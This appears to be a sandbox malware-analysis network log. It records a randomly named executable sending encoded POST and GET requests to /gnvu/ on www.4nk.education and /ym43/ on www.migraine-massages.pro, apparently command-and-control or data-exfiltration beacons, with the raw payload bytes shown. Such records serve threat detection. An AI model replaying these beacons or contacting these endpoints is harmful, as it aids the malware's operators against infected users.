                                                                          Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                                                          Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          3192.168.2.449739217.70.184.50802060C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 12, 2024 08:52:29.139610052 CET10736OUTPOST /gnvu/ HTTP/1.1
                                                                          Accept: */*
                                                                          Accept-Encoding: gzip, deflate
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Content-Length: 10303
                                                                          Cache-Control: max-age=0
                                                                          Connection: close
                                                                          Host: www.4nk.education
                                                                          Origin: http://www.4nk.education
                                                                          Referer: http://www.4nk.education/gnvu/
                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                          Data Raw: 4c 32 6d 30 5a 6e 3d 71 7a 71 44 68 39 6e 49 74 74 51 32 64 4f 72 53 45 71 38 4a 52 62 32 61 4c 68 47 36 30 62 31 42 2b 2f 4f 6d 62 61 54 78 63 41 6a 4b 37 2f 61 6b 76 62 71 34 59 43 4c 48 79 5a 68 70 39 44 46 6e 43 79 75 50 72 54 6c 36 42 71 50 41 44 69 42 4f 6e 55 77 72 6e 47 37 59 74 34 47 2b 6b 79 4a 4c 39 48 6b 68 6f 64 31 53 56 6a 58 51 69 4b 41 42 56 6a 61 35 6c 2f 2b 47 71 2f 76 35 45 75 78 77 63 47 30 4b 68 67 63 4d 4d 75 4a 36 72 33 55 79 33 52 44 4c 38 49 66 55 2f 2b 43 2b 66 54 70 35 63 55 32 45 49 65 4c 4a 32 71 59 65 47 4e 37 49 77 7a 6b 6b 44 56 57 6a 7a 4b 5a 2f 50 39 6e 66 42 31 76 49 2f 75 75 63 66 72 39 63 70 6d 4f 71 6c 51 6f 2b 70 32 38 31 55 4d 53 76 34 4d 66 74 45 4b 5a 48 64 2f 47 4c 50 44 50 36 63 4e 2f 47 66 78 7a 70 49 58 47 46 65 35 31 78 2b 48 56 75 63 73 43 74 6d 51 74 34 71 78 62 35 63 59 53 6c 54 54 46 5a 63 61 6e 4e 78 6e 39 30 39 72 50 39 41 4d 46 37 6d 73 56 5a 70 4a 66 56 7a 77 6c 59 71 37 54 4d 58 30 68 6d 51 31 31 77 75 4d 57 47 43 41 47 34 33 30 70 61 36 73 6c [TRUNCATED]
                                                                          Data Ascii: L2m0Zn=qzqDh9nIttQ2dOrSEq8JRb2aLhG60b1B+/OmbaTxcAjK7/akvbq4YCLHyZhp9DFnCyuPrTl6BqPADiBOnUwrnG7Yt4G+kyJL9Hkhod1SVjXQiKABVja5l/+Gq/v5EuxwcG0KhgcMMuJ6r3Uy3RDL8IfU/+C+fTp5cU2EIeLJ2qYeGN7IwzkkDVWjzKZ/P9nfB1vI/uucfr9cpmOqlQo+p281UMSv4MftEKZHd/GLPDP6cN/GfxzpIXGFe51x+HVucsCtmQt4qxb5cYSlTTFZcanNxn909rP9AMF7msVZpJfVzwlYq7TMX0hmQ11wuMWGCAG430pa6slmttIKNyZVPJMT7N7Ju4DPDorEG2DHWmKG7g0FzfVqP+rR13u3BiLWDa19ZQTPiDkU7HjiPUXGfcDRyazkv9ZgNRLR0yClP/PnyrJWNJcPrvnbhJ+XQLlf03vn+CSCZIIn3meV+Aga+0tL10hkkeai5+syQky+ptkMz5jdzUo7vOn2x2IxMWrFMf9hF1R6UbKuH0oJr3JVsIu7fy1i3Ahx8HUSuB1QGoofu5eNlC9DcR5F9vKDYHfVuFQqosyzYwqj15X1nF855OocQ4VxrIFY/CWF2aeU1RlzFId5It6z76OE4rY0g/WVdISn8mensnUECQuuxFvf0dD5QhaXg4V1BF+ZAxbA2X3Eqjn6pTPTf4M0ZFh2JBTKxdH0T2j3PVXfLFwVWCIK2qNeLjTKvb4/lUNxWd6LOCpAdtc6VjH+n//saYQYf1Qrneu7SfBikl/tcOxaBWELD30nZua942fm5ASNI6sgW3V7EwFn+n4Vm6swYZeE/fZ8NCI1QV/PHNUq0tTz0dpOV+ipRVWecNz3sD50d7a3RrY9X7KN0KY3d2bRaG8AkU/Y/y34CPwtw0cYgFU0SLziVrv5IC/YBmCfak3eeNZzCyo3FzdKDiepvJrPX63d/32LItcy3RGNgfDkgOY3ySsyymGSrW3wSmBJvnLsSlZeRM/Td [TRUNCATED]
                                                                          Nov 12, 2024 08:52:29.984438896 CET713INHTTP/1.1 502 Bad Gateway
                                                                          Server: nginx
                                                                          Date: Tue, 12 Nov 2024 07:52:29 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 568
                                                                          Connection: close
                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 [TRUNCATED]
                                                                          Data Ascii: <html><head><title>502 Bad Gateway</title></head><body bgcolor="white"><center><h1>502 Bad Gateway</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          4192.168.2.449740217.70.184.50802060C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 12, 2024 08:52:31.676389933 CET373OUTGET /gnvu/?L2m0Zn=nxCjiJTB74oIWabXQvFQY5//bWyU0Jpkhoi4dayZTBfl5+e+2r+tNQPR6bJXqR1fUXmtsCJ3OPXRNkZ1wk4FhkS61tyoqX9N8hRwttUIYDPzkdcxTjy0zd8=&JPc=NBQdBBkPWTStX HTTP/1.1
                                                                          Accept: */*
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Connection: close
                                                                          Host: www.4nk.education
                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                          Nov 12, 2024 08:52:32.486896038 CET1236INHTTP/1.1 200 OK
                                                                          Server: nginx
                                                                          Date: Tue, 12 Nov 2024 07:52:32 GMT
                                                                          Content-Type: text/html
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Vary: Accept-Encoding
                                                                          Content-Security-Policy: default-src 'self'; script-src 'nonce-4066e55e600b429c8e042882065449c3';
                                                                          Vary: Accept-Language
                                                                          Data Raw: 39 32 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 22 20 63 6f 6e 74 65 6e 74 3d 22 64 65 66 61 75 6c 74 2d 73 72 63 20 27 73 65 6c 66 27 3b 20 73 63 72 69 70 74 2d 73 72 63 20 27 6e 6f 6e 63 65 2d 34 30 36 36 65 35 35 65 36 30 30 62 34 32 39 63 38 65 30 34 32 38 38 32 30 36 35 34 34 39 63 33 27 3b 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 54 68 69 73 20 64 6f 6d 61 69 6e 20 6e 61 6d 65 20 68 61 73 20 62 65 65 6e 20 72 [TRUNCATED]
                                                                          Data Ascii: 922<!DOCTYPE html><html class="no-js" lang=en> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width"> <meta http-equiv="Content-Security-Policy" content="default-src 'self'; script-src 'nonce-4066e55e600b429c8e042882065449c3';"> <meta name="description" content="This domain name has been registered with Gandi.net. It is currently parked by the owner."> <title>4nk.education</title> <link rel="stylesheet" type="text/css" href="main-dbee9253.css"> <link rel="shortcut icon" href="favicon.ico" type="image/x-icon"/> <link rel="preload" as="font" href="fonts/Inter/Inter-Regular--latin.woff2" type="font/woff2" crossorigin/> <link rel="preload" as="font" href="fonts/Inter/Inter-SemiBold--latin.woff2" type="font/woff2" crossorigin/> </head> <body> <div class="ParkingPage_2023-root_2dpus "><main class="OldStatic_2023-root_1AGy1 Parking_2023-root_qhMQ2"><div><article clas
                                                                          Nov 12, 2024 08:52:32.486912966 CET1236INData Raw: 73 3d 22 50 61 72 6b 69 6e 67 5f 32 30 32 33 2d 63 6f 6e 74 65 6e 74 5f 31 72 41 38 37 22 3e 3c 68 31 20 63 6c 61 73 73 3d 22 4f 6c 64 53 74 61 74 69 63 5f 32 30 32 33 2d 74 69 74 6c 65 5f 31 33 63 65 4b 22 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20
                                                                          Data Ascii: s="Parking_2023-content_1rA87"><h1 class="OldStatic_2023-title_13ceK">This domain name has been registered with Gandi.net</h1><div class="OldStatic_2023-text_37nqO Parking_2023-text_1JZys"><p><a href="https://whois.gandi.net/en/results?search=
                                                                          Nov 12, 2024 08:52:32.486921072 CET166INData Raw: 4c 69 73 74 65 6e 65 72 28 27 63 6c 69 63 6b 27 2c 20 28 65 29 20 3d 3e 20 7b 0a 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 70 6c 61 63 65 28 61 74 6f 62 28 65 2e 74 61 72 67 65 74 2e 64 61 74 61 73 65 74 2e 75 72 6c
                                                                          Data Ascii: Listener('click', (e) => { window.location.replace(atob(e.target.dataset.url) + '4nk.education'); }); });</script></main></div> </body></html>0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          5192.168.2.449742199.59.243.227802060C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 12, 2024 08:52:37.872726917 CET658OUTPOST /ym43/ HTTP/1.1
                                                                          Accept: */*
                                                                          Accept-Encoding: gzip, deflate
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Content-Length: 203
                                                                          Cache-Control: max-age=0
                                                                          Connection: close
                                                                          Host: www.migraine-massages.pro
                                                                          Origin: http://www.migraine-massages.pro
                                                                          Referer: http://www.migraine-massages.pro/ym43/
                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                          Data Raw: 4c 32 6d 30 5a 6e 3d 6f 7a 69 63 77 33 38 73 46 4f 68 55 2b 59 31 4f 69 33 74 75 45 53 38 4b 73 2b 62 51 45 47 50 35 63 49 46 65 33 7a 68 37 65 51 78 35 51 41 55 69 6f 41 54 35 36 63 51 62 36 4b 75 6b 31 77 38 66 71 61 42 72 49 73 59 51 51 53 6e 68 41 79 76 53 47 55 4e 62 52 49 74 61 56 34 35 6e 70 75 66 6a 6d 6c 2b 4d 49 62 59 53 44 75 6b 6e 2b 6f 68 59 56 63 63 2f 54 54 78 34 51 39 64 6a 4a 4c 77 74 38 2b 74 54 64 33 35 61 79 53 61 48 75 61 79 52 77 37 79 54 71 37 4d 36 51 38 52 4a 52 73 2f 2b 43 69 63 2f 4b 79 6b 71 59 31 35 4f 30 79 69 73 38 67 38 36 44 72 71 67 2b 48 35 62 31 42 37 6b 61 51 3d 3d
                                                                          Data Ascii: L2m0Zn=ozicw38sFOhU+Y1Oi3tuES8Ks+bQEGP5cIFe3zh7eQx5QAUioAT56cQb6Kuk1w8fqaBrIsYQQSnhAyvSGUNbRItaV45npufjml+MIbYSDukn+ohYVcc/TTx4Q9djJLwt8+tTd35aySaHuayRw7yTq7M6Q8RJRs/+Cic/KykqY15O0yis8g86Drqg+H5b1B7kaQ==
                                                                          Nov 12, 2024 08:52:38.480180979 CET1236INHTTP/1.1 200 OK
                                                                          date: Tue, 12 Nov 2024 07:52:37 GMT
                                                                          content-type: text/html; charset=utf-8
                                                                          content-length: 1154
                                                                          x-request-id: 0cc35890-9fb6-4606-9847-c068042f0f86
                                                                          cache-control: no-store, max-age=0
                                                                          accept-ch: sec-ch-prefers-color-scheme
                                                                          critical-ch: sec-ch-prefers-color-scheme
                                                                          vary: sec-ch-prefers-color-scheme
                                                                          x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AmbjvjrIx9lffvXMupOKDjWc1YuTGeQdht6R9ZfYrEB5pUXQE9JLMdUL7+KWqQDDgbWI4w961v4D0FUjogGIVA==
                                                                          set-cookie: parking_session=0cc35890-9fb6-4606-9847-c068042f0f86; expires=Tue, 12 Nov 2024 08:07:38 GMT; path=/
                                                                          connection: close
                                                                          Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 41 6d 62 6a 76 6a 72 49 78 39 6c 66 66 76 58 4d 75 70 4f 4b 44 6a 57 63 31 59 75 54 47 65 51 64 68 74 36 52 39 5a 66 59 72 45 42 35 70 55 58 51 45 39 4a 4c 4d 64 55 4c 37 2b 4b 57 71 51 44 44 67 62 57 49 34 77 39 36 31 76 34 44 30 46 55 6a 6f 67 47 49 56 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                          Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AmbjvjrIx9lffvXMupOKDjWc1YuTGeQdht6R9ZfYrEB5pUXQE9JLMdUL7+KWqQDDgbWI4w961v4D0FUjogGIVA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                          Nov 12, 2024 08:52:38.480201006 CET607INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                          Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMGNjMzU4OTAtOWZiNi00NjA2LTk4NDctYzA2ODA0MmYwZjg2IiwicGFnZV90aW1lIjoxNzMxMzk3OT


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          6192.168.2.449749199.59.243.227802060C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 12, 2024 08:52:40.414700985 CET678OUTPOST /ym43/ HTTP/1.1
                                                                          Accept: */*
                                                                          Accept-Encoding: gzip, deflate
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Content-Length: 223
                                                                          Cache-Control: max-age=0
                                                                          Connection: close
                                                                          Host: www.migraine-massages.pro
                                                                          Origin: http://www.migraine-massages.pro
                                                                          Referer: http://www.migraine-massages.pro/ym43/
                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                          Data Raw: 4c 32 6d 30 5a 6e 3d 6f 7a 69 63 77 33 38 73 46 4f 68 55 2b 34 46 4f 67 55 31 75 54 69 38 4a 69 65 62 51 4f 6d 50 39 63 49 5a 65 33 79 55 2b 65 6b 64 35 51 68 6b 69 72 45 2f 35 37 63 51 62 69 36 75 6c 37 51 38 57 71 61 4e 56 49 70 67 51 51 53 7a 68 41 33 72 53 47 43 46 59 52 59 74 59 65 59 35 70 30 65 66 6a 6d 6c 2b 4d 49 62 4e 33 44 75 63 6e 2f 62 35 59 58 39 63 77 65 7a 78 37 52 39 64 6a 44 72 77 70 38 2b 74 31 64 79 52 77 79 58 47 48 75 62 43 52 77 70 61 53 6c 37 4d 67 4e 4d 51 4e 51 2f 69 6f 48 7a 52 4c 50 6a 51 64 62 78 31 4b 78 30 76 32 74 52 64 74 52 72 4f 54 6a 41 77 76 34 43 47 74 42 57 77 46 46 63 62 61 43 7a 66 4a 4f 45 6e 6e 4a 79 5a 74 51 44 30 3d
                                                                          Data Ascii: L2m0Zn=ozicw38sFOhU+4FOgU1uTi8JiebQOmP9cIZe3yU+ekd5QhkirE/57cQbi6ul7Q8WqaNVIpgQQSzhA3rSGCFYRYtYeY5p0efjml+MIbN3Ducn/b5YX9cwezx7R9djDrwp8+t1dyRwyXGHubCRwpaSl7MgNMQNQ/ioHzRLPjQdbx1Kx0v2tRdtRrOTjAwv4CGtBWwFFcbaCzfJOEnnJyZtQD0=
                                                                          Nov 12, 2024 08:52:41.028640985 CET1236INHTTP/1.1 200 OK
                                                                          date: Tue, 12 Nov 2024 07:52:40 GMT
                                                                          content-type: text/html; charset=utf-8
                                                                          content-length: 1154
                                                                          x-request-id: 50048ca5-6c85-4d84-8585-902f8aa8d260
                                                                          cache-control: no-store, max-age=0
                                                                          accept-ch: sec-ch-prefers-color-scheme
                                                                          critical-ch: sec-ch-prefers-color-scheme
                                                                          vary: sec-ch-prefers-color-scheme
                                                                          x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AmbjvjrIx9lffvXMupOKDjWc1YuTGeQdht6R9ZfYrEB5pUXQE9JLMdUL7+KWqQDDgbWI4w961v4D0FUjogGIVA==
                                                                          set-cookie: parking_session=50048ca5-6c85-4d84-8585-902f8aa8d260; expires=Tue, 12 Nov 2024 08:07:40 GMT; path=/
                                                                          connection: close
                                                                          Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 41 6d 62 6a 76 6a 72 49 78 39 6c 66 66 76 58 4d 75 70 4f 4b 44 6a 57 63 31 59 75 54 47 65 51 64 68 74 36 52 39 5a 66 59 72 45 42 35 70 55 58 51 45 39 4a 4c 4d 64 55 4c 37 2b 4b 57 71 51 44 44 67 62 57 49 34 77 39 36 31 76 34 44 30 46 55 6a 6f 67 47 49 56 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                          Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AmbjvjrIx9lffvXMupOKDjWc1YuTGeQdht6R9ZfYrEB5pUXQE9JLMdUL7+KWqQDDgbWI4w961v4D0FUjogGIVA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                          Nov 12, 2024 08:52:41.028656006 CET607INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                          Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNTAwNDhjYTUtNmM4NS00ZDg0LTg1ODUtOTAyZjhhYThkMjYwIiwicGFnZV90aW1lIjoxNzMxMzk3OT


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          7192.168.2.449765199.59.243.227802060C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 12, 2024 08:52:42.970439911 CET10760OUTPOST /ym43/ HTTP/1.1
                                                                          Accept: */*
                                                                          Accept-Encoding: gzip, deflate
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Content-Length: 10303
                                                                          Cache-Control: max-age=0
                                                                          Connection: close
                                                                          Host: www.migraine-massages.pro
                                                                          Origin: http://www.migraine-massages.pro
                                                                          Referer: http://www.migraine-massages.pro/ym43/
                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                          Data Raw: 4c 32 6d 30 5a 6e 3d 6f 7a 69 63 77 33 38 73 46 4f 68 55 2b 34 46 4f 67 55 31 75 54 69 38 4a 69 65 62 51 4f 6d 50 39 63 49 5a 65 33 79 55 2b 65 6c 4a 35 51 58 77 69 72 6c 2f 35 70 4d 51 62 72 61 75 67 37 51 39 55 71 65 70 76 49 70 6b 75 51 51 4c 68 42 52 58 53 58 48 6c 59 65 59 74 59 52 34 35 6f 70 75 65 2b 6d 6c 75 41 49 62 64 33 44 75 63 6e 2f 64 39 59 54 73 63 77 59 7a 78 34 51 39 64 56 4a 4c 77 42 38 34 45 4f 64 79 64 4b 7a 6a 4b 48 76 37 53 52 78 63 75 53 73 37 4d 2b 64 63 51 72 51 2f 76 32 48 33 78 78 50 6a 6c 4b 62 32 39 4b 39 54 65 51 34 6c 56 53 4d 71 2b 37 6a 52 6f 4f 68 6a 53 74 61 42 41 51 4f 39 4c 6f 65 53 65 6d 4d 47 43 4b 55 51 68 5a 4b 6b 6d 39 69 68 72 68 53 4a 69 32 77 50 61 64 61 73 7a 6b 5a 6d 35 49 41 72 37 72 68 73 49 33 6d 70 39 70 6c 50 48 6e 34 77 4a 54 42 5a 71 79 4b 77 4c 59 36 65 64 69 69 73 6b 6b 57 51 39 69 4f 79 46 4c 2f 69 6c 52 6e 39 38 7a 71 73 4d 78 4d 6c 65 57 6a 32 68 56 72 45 45 39 63 34 73 73 79 7a 45 68 57 6a 65 63 72 6c 54 31 45 4a 32 35 73 53 68 4a 56 53 4f [TRUNCATED]
